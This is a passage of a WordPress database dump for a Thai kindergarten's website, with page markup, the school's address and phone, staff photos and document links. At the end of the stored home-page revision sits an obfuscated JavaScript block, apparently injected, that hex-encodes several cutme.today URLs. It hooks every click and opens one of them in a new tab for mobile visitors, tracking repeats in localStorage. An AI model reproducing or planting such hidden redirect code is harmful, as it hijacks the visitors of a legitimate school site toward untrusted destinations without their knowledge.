{\"uniqueId\":\"73d9ffe7\",\"columns\":2,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"4cd8c7be\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:html -->\n<iframe src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d1925.9723083104054!2d104.32273680156584!3d15.106380799999997!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x3116e380deaa317f%3A0x4d9751ab2c19279f!2z4LmC4Lij4LiH4LmA4Lij4Li14Lii4LiZ4Lit4LiZ4Li44Lia4Liy4Lil4Lin4Lix4LiU4Lie4Lij4Liw4LmC4LiVICjguJ3guYjguLLguKLguKHguLHguJjguKLguKEp!5e0!3m2!1sth!2sth!4v1722088475215!5m2!1sth!2sth\" width=\"100%\" height=\"350\" style=\"border:0;\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"457aa97e\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingTop\":\"30px\",\"paddingRight\":\"30px\",\"paddingBottom\":\"0px\",\"paddingLeft\":\"30px\",\"paddingTopMobile\":\"40px\",\"paddingRightMobile\":\"15px\",\"paddingBottomMobile\":\"30px\",\"paddingLeftMobile\":\"15px\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"b3723dea\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-b3723dea gb-headline-text\"><strong>โรงเรียนอนุบาลวัดพระโต</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"51a75706\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-51a75706 gb-headline-text\">1193 ถนนขุขันธ์ ตำบลเมืองเหนือ อำเภอเมืองศรีสะเกษ จังหวัดศรีสะเกษ 33000</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"fa4bd31f\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-fa4bd31f gb-headline-text\"><strong>ติดต่อเรา</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e820350\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e820350 gb-headline-text\">โทรศัพท์ : 0-4561-2730</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e95d8cb\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e95d8cb gb-headline-text\"><strong>ติดตามเราได้ที่</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.facebook.com/plugins/page.php?href=https%3A%2F%2Fwww.facebook.com%2Fprofile.php%3Fid%3D61556083436494&tabs=timeline&width=330&height=80&small_header=true&adapt_container_width=true&hide_cover=true&show_facepile=true&appId\" width=\"330\" height=\"80\" style=\"border:none;overflow:hidden\" scrolling=\"no\" frameborder=\"0\" allowfullscreen=\"true\" allow=\"autoplay; clipboard-write; encrypted-media; picture-in-picture; web-share\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\n\n<p><script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script></p>','หน้าแรก','','inherit','closed','closed','','19-revision-v1','','','2025-07-14 15:24:23','2025-07-14 08:24:23','',19,'http://watprato.ssk.in.th/?p=664',0,'revision','',0),
(665,1,'2025-07-14 15:29:09','2025-07-14 08:29:09','','กิจกรรมถวายเทียนพรรษา เนื่องในวันอาสาฬหบูชาและวันเข้าพรรษา','','publish','open','open','','%e0%b8%81%e0%b8%b4%e0%b8%88%e0%b8%81%e0%b8%a3%e0%b8%a3%e0%b8%a1%e0%b8%96%e0%b8%a7%e0%b8%b2%e0%b8%a2%e0%b9%80%e0%b8%97%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%9e%e0%b8%a3%e0%b8%a3%e0%b8%a9%e0%b8%b2-2','','','2025-07-14 15:30:13','2025-07-14 08:30:13','',0,'http://watprato.ssk.in.th/?p=665',0,'post','',0),
(666,1,'2025-07-14 15:29:09','2025-07-14 08:29:09','','กิจกรรมถวายเทียนพรรษา เนื่องในวันอาสาฬหบูชาและวันเข้าพรรษา','','inherit','closed','closed','','665-revision-v1','','','2025-07-14 15:29:09','2025-07-14 08:29:09','',665,'http://watprato.ssk.in.th/?p=666',0,'revision','',0),
(667,1,'2025-07-14 15:31:30','2025-07-14 08:31:30','<!-- wp:gallery {\"linkTo\":\"none\"} -->\n<figure class=\"wp-block-gallery has-nested-images columns-default is-cropped\"><!-- wp:image {\"id\":661,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://watprato.ssk.in.th/wp-content/uploads/2025/07/516551442_122236779134202781_7691696061389877814_n-1-724x1024.jpg\" alt=\"\" class=\"wp-image-661\"/></figure>\n<!-- /wp:image --></figure>\n<!-- /wp:gallery -->','โรงเรียนอนุบาลวัดพระโต เข้าร่วมพิธีทบทวนคำปฏิญาณและสวนสนาม เนื่องในวันคล้ายวันสถาปนาลูกเสือแห่งชาติ ประจำปีการศึกษา 2568','','inherit','closed','closed','','660-revision-v1','','','2025-07-14 15:31:30','2025-07-14 08:31:30','',660,'http://watprato.ssk.in.th/?p=667',0,'revision','',0);
INSERT INTO `wp_posts` VALUES
(668,1,'2025-07-15 10:31:43','2025-07-15 03:31:43','<!-- wp:kadence/rowlayout {\"uniqueID\":\"19_fac40f-62\",\"columns\":1,\"colLayout\":\"equal\",\"padding\":[\"0\",\"\",\"0\",\"\"],\"displayBoxShadow\":true,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"background\":\"#ffffff\",\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"19_937c93-07\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column19_937c93-07\"><div class=\"kt-inside-inner-col\"><!-- wp:generateblocks/container {\"uniqueId\":\"afb41c1a\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"f1b9a3f2\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/image {\"uniqueId\":\"41ac449a\",\"mediaId\":85,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-41ac449a\"><img class=\"gb-image gb-image-41ac449a\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/awpt.gif\" alt=\"\" title=\"awpt\"/></figure>\n<!-- /wp:generateblocks/image -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e9bcd64\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"f8167df0\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2603ad26\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"d4c24200\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"273bf937\",\"mediaId\":46,\"sizeSlug\":\"full\",\"widthMobile\":\"300px\",\"alignmentMobile\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-273bf937\"><img class=\"gb-image gb-image-273bf937\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/นายอนุศักดิ์-พันธ์งาม-png.png\" alt=\"\" title=\"นายอนุศักดิ์ พันธ์งาม png\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:generateblocks/image {\"uniqueId\":\"f67ede92\",\"mediaId\":406,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-f67ede92\"><img class=\"gb-image gb-image-f67ede92\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/09/รองผู้อำนวยการ1.jpg\" alt=\"\" title=\"รองผู้อำนวยการ1\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:group {\"fontSize\":\"small\",\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group has-small-font-size\"><!-- wp:generateblocks/container {\"uniqueId\":\"36016ef6\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/image {\"uniqueId\":\"e194b6ce\",\"mediaId\":401,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-e194b6ce\"><img class=\"gb-image gb-image-e194b6ce\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/09/รองผู้อำนวยการ3.jpg\" alt=\"\" title=\"รองผู้อำนวยการ3\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:generateblocks/image {\"uniqueId\":\"3791db60\",\"mediaId\":404,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-3791db60\"><img class=\"gb-image gb-image-3791db60\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/09/รองผู้อำนวยการ2-1.jpg\" alt=\"\" title=\"รองผู้อำนวยการ2\"/></figure>\n<!-- /wp:generateblocks/image -->\n<!-- /wp:generateblocks/container --></div>\n<!-- /wp:group -->\n\n<!-- wp:kadence/advancedbtn {\"uniqueID\":\"19_67610f-d3\"} -->\n<div class=\"wp-block-kadence-advancedbtn kb-buttons-wrap kb-btns19_67610f-d3\"><!-- wp:kadence/singlebtn {\"uniqueID\":\"19_3b4373-bb\",\"text\":\"ติดต่อผู้อำนวยการโรงเรียน\\u003cbr\\u003eรองผู้อำนวยการโรงเรียน\",\"link\":\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=share_link\",\"sizePreset\":\"small\",\"background\":\"#cf2e2e\",\"backgroundHover\":\"#f78da7\"} /--></div>\n<!-- /wp:kadence/advancedbtn --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"1cb712a0\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-1cb712a0 gb-button-text\"><strong>เกี่ยวกับโรงเรียน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:kadence/iconlist {\"listStyles\":[{\"size\":[16,\"\",\"\"],\"sizeType\":\"px\",\"lineHeight\":[\"\",\"\",\"\"],\"lineType\":\"px\",\"letterSpacing\":\"\",\"family\":\"\",\"google\":false,\"style\":\"\",\"weight\":\"\",\"variant\":\"\",\"subset\":\"\",\"loadGoogle\":true,\"color\":\"\",\"textTransform\":\"\"}],\"uniqueID\":\"19_d15510-f9\",\"listPadding\":[\"\",\"xxs\",\"\",\"xxs\"],\"icon\":\"fe_arrowRightCircle\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items19_d15510-f9 kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"19_27c3a7-66\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_27c3a7-66\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1QO7vaeEKkhB3kDmvrrIdBi3qQkJ8oya1/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1QO7vaeEKkhB3kDmvrrIdBi3qQkJ8oya1/view?usp=sharing\">ประวัติโรงเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_c3bdf0-e8\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_c3bdf0-e8\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1j7kEi4hP1hbBIpZn7oJTgY-nHJ1PJQLs/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1j7kEi4hP1hbBIpZn7oJTgY-nHJ1PJQLs/view?usp=drive_link\">วิสัยทัศน์/พันธกิจ/เป้าประสงค์</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_aba00e-94\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_aba00e-94\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/180gGIRpJLJ6MXT59TBBckEoyMyJ0syro/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/180gGIRpJLJ6MXT59TBBckEoyMyJ0syro/view?usp=drive_link\">กรรมการสถานศึกษา</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_6a67b5-2d\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_6a67b5-2d\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1WayPS34cjiQafz8cVXMrSwi14axv8wNL/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1WayPS34cjiQafz8cVXMrSwi14axv8wNL/view?usp=sharing\">ข้อมูลผู้บริหาร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_735bb1-be\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_735bb1-be\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1KNY_0cfvU0tSAr568ZHSWspTl7t86-R6/view?usp=sharing\" data-type=\"page\" data-id=\"19\">ข้อมูลบุคลากร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_e25727-a3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_e25727-a3\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1aH-777mmqYYRu0vbttHBA-BPqFi1gHG0/view?usp=drive_link\" data-type=\"link\" 